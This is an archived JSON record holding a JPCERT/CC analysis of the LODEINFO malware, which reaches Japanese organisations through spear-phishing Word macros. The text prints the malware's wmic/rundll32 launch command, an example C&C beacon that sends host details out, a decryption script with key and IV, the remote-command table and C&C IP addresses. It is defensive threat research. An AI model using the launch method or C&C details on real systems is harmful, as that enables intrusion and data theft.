{
	"id": "e84bb4ad-d868-4fed-a4fb-9550d175ec28",
	"created_at": "2026-04-06T00:14:56.209283Z",
	"updated_at": "2026-04-10T03:30:11.966738Z",
	"deleted_at": null,
	"sha1_hash": "12ba9e66b848f93413164d4639e181e9abeac648",
	"title": "Malware “LODEINFO” Targeting Japan - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 697091,
	"plain_text": "Malware “LODEINFO” Targeting Japan - JPCERT/CC Eyes\r\nBy 喜野 孝太(Kota Kino)\r\nPublished: 2020-02-26 · Archived: 2026-04-05 14:26:23 UTC\r\nLODEINFO\r\nJPCERT/CC has been observing a new type of spear-phishing email targeting Japanese organisations since December 2019. The emails carry a malicious Word file attachment that leads to the newly observed malware “LODEINFO”. This article introduces the details of this malware.\r\nHow LODEINFO is launched\r\nFigure 1 describes the flow of events from executing the Word file until LODEINFO is launched.\r\nFigure 1: Flow of events until LODEINFO runs\r\nWhen the macro is enabled, LODEINFO is created on the host and then executed by rundll32.exe with the following command:\r\nwmic process call create \"cmd /c cd %ProgramData%\u0026start rundll32.exe [LODEINFO file path] main\"\r\nAfter that, LODEINFO launches a svchost.exe process and injects the payload into it. It then runs the payload as a thread. The next section explains the behaviour of LODEINFO after the injection.\r\nDetails of LODEINFO behaviour\r\nhttps://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html\r\nPage 1 of 7\r\nLODEINFO communicates with specific hosts and operates according to the commands received from them. The following is an example of an HTTP POST request that LODEINFO sends.\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nHost: [hostname]\r\nContent-Length: 193\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\ndata=DIajqcc5lVuJpjwvr36msbQAAADitmc5LmhLlVituiM4OtDohYHRxBJ2R5yWjTYNyBTkUMGD2CPFpZw02cwPvl3Yb0SmUAAA\r\nThe data is encrypted with AES and then BASE64-encoded. It contains information such as the name, language environment and MAC address of the host running LODEINFO. Figure 2 shows the decoded data. (Please refer to Appendix A for the data format.)\r\nFigure 2: Part of decoded data\r\nThe following is part of a Python 3 script that decodes the HTTP POST request.\r\nfrom Crypto.Cipher import AES\r\nfrom base64 import urlsafe_b64decode\r\nfrom binascii import a2b_hex\r\n\r\ndef decrypt_lodeinfo_data(enc_data: str, key: bytes, iv: bytes) -\u003e bytes:\r\n    ## decode the header with base64 (\".\" is used in place of the \"=\" padding character)\r\n    header_b64 = enc_data[:0x1C]\r\n    header = urlsafe_b64decode(header_b64.replace(\".\", \"=\"))\r\n    ## size of the BASE64-encoded body that follows the header\r\n    postdata_size = int.from_bytes(header[0x10:0x14], byteorder=\"little\")\r\n    postdata_b64 = enc_data[0x1C:0x1C + postdata_size]\r\n    postdata = urlsafe_b64decode(postdata_b64.replace(\".\", \"=\"))\r\n    ## decrypt with AES (CBC mode)\r\n    cipher = AES.new(key, AES.MODE_CBC, iv)\r\n    decrypt_size = int.from_bytes(postdata[0x30:0x34], byteorder=\"little\")\r\n    dec_data = cipher.decrypt(postdata[0x34:0x34 + decrypt_size])\r\n    ## remove junk bytes (the last byte holds the number of trailing junk bytes)\r\n    junk_size = dec_data[-1]\r\n    dec_data = dec_data[:decrypt_size - junk_size]\r\n    return dec_data\r\n\r\nencrypted_data = \"DIajqcc5lVuJpjwvr36msbQAAADitmc5LmhLlVituiM4OtDohYHRxBJ2R5yWjTYNyBTkUMGD2CPFpZw02cw\r\nKEY = a2b_hex(\"E20EF6C66A838DA222821DB1C5777251F1A9D5D14D2344CED68A353BFCAC4C5A\")\r\nIV = a2b_hex(\"CC45ABAD58152C6150F157367ECC53F3\")\r\ndecrypted_data = decrypt_lodeinfo_data(encrypted_data, KEY, IV)\r\nprint(\"Decrypted Data: \", bytes.hex(decrypted_data))\r\nNext, LODEINFO receives commands. The response from the C\u0026C server is encrypted with AES and encoded with BASE64 in the same way as the HTTP POST request. According to the commands sent from the C\u0026C server, LODEINFO executes the following functions. (Please refer to Appendix B for command details.)\r\nExecute PE files\r\nExecute shellcode\r\nUpload/download files\r\nKill processes\r\nSend file list\r\nSend malware version\r\nCode in LODEINFO\r\nIt turned out that many parts of the code that appear in LODEINFO are similar to the source code of LodePNG[1], a PNG encoder/decoder shared on GitHub. However, it is uncertain why LODEINFO includes this code, as it does not seem to use any of LodePNG’s functions.\r\nIn closing\r\nLODEINFO seems to be under development, as it contains the string “v0.1.2” as version information and some debug code in multiple sections. It is likely that attacks using this malware will continue. The hash value of a sample similar to LODEINFO is listed in Appendix C and a list of C\u0026C servers in Appendix D. Please make sure that none of your devices is communicating with such hosts.\r\n- Kota Kino\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] GitHub: LodePNG - PNG encoder and decoder in C and C++\r\nhttps://github.com/lvandeve/lodepng\r\nAppendix A Exchanged data\r\nTable A-1: Data format (after BASE64 decoding)\r\nOffset Length Contents\r\n0x00 16 SHA512 value of AES key (first 16 bytes)\r\n0x10 4 Size of the BASE64-encoded data after 0x15\r\n0x14 1 Unknown\r\n0x15 48 SHA512 value of data before AES encryption (first 48 bytes)\r\n0x45 4 Size of AES-encrypted data\r\n0x49 variable AES-encrypted data\r\nTable A-2: Example of BASE64-decoded data\r\nAppendix B Commands\r\nTable B: Commands\r\nValue Contents\r\nMZ Execute PE files\r\n0xE9 Execute shellcode\r\ncd Change current directory\r\nls Send file list\r\nsend Download files\r\nrecv Upload files\r\ncat Upload files\r\nmemory Execute shellcode (inject into svchost.exe)\r\nkill Kill arbitrary process\r\nver Send malware version\r\nAppendix C SHA-256 Hash Value of a sample\r\nb50d83820a5704522fee59164d7bc69bea5c834ebd9be7fd8ad35b040910807f\r\nAppendix D C\u0026C servers\r\n45.67.231.169\r\n162.244.32.148\r\n193.228.52.57\r\n喜野 孝太(Kota Kino)\r\nKota Kino has been a Malware/Forensic Analyst in the Incident Response Group at JPCERT/CC since August 2019.\r\nSource: https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html"
	],
	"report_names": [
		"malware-lodeinfo-targeting-japan.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434496,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/12ba9e66b848f93413164d4639e181e9abeac648.pdf",
		"text": "https://archive.orkl.eu/12ba9e66b848f93413164d4639e181e9abeac648.txt",
		"img": "https://archive.orkl.eu/12ba9e66b848f93413164d4639e181e9abeac648.jpg"
	}
}